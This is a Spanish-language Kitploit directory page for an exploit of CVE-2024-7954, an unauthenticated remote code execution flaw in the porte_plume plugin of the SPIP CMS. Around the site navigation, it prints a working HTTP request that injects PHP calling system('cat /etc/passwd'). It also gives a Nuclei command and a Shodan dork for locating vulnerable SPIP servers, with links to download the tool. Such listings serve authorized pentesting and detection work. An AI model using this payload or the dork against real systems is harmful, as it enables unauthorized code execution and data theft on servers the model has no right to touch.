Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RCE_CVE-2024-7954 — Exploit para CVE-2024-7954, una ejecución remota de código no autenticada en el plugin porte_plume de SPIP, con una plantilla de Nuclei y un dork de Shodan para la detección. | Kitploit
Herramientas/GitHubGitHub/thecyberguy-17/rce_cve-2024-7954
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubthecyberguy-17/rce_cve-2024-7954

RCE_CVE-2024-7954

Exploit para CVE-2024-7954, una ejecución remota de código no autenticada en el plugin porte_plume de SPIP, con una plantilla de Nuclei y un dork de Shodan para la detección.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
5hace 1 añoAún no revisado
Compartir

RCE_CVE-2024-7954

Descripción:

El plugin porte_plume utilizado por SPIP anterior a 4.30-alpha2, 4.2.13 y 4.1.16 es vulnerable a una vulnerabilidad de ejecución de código arbitrario. Un atacante remoto no autenticado puede ejecutar PHP arbitrario como el usuario de SPIP enviando una solicitud HTTP manipulada. (CRÍTICO)

Explotación:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Herramienta utilizada:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Dork de Shodan:

app="SPIP"

Referencia:

1) https://github.com/fa-rrel
Descargar herramienta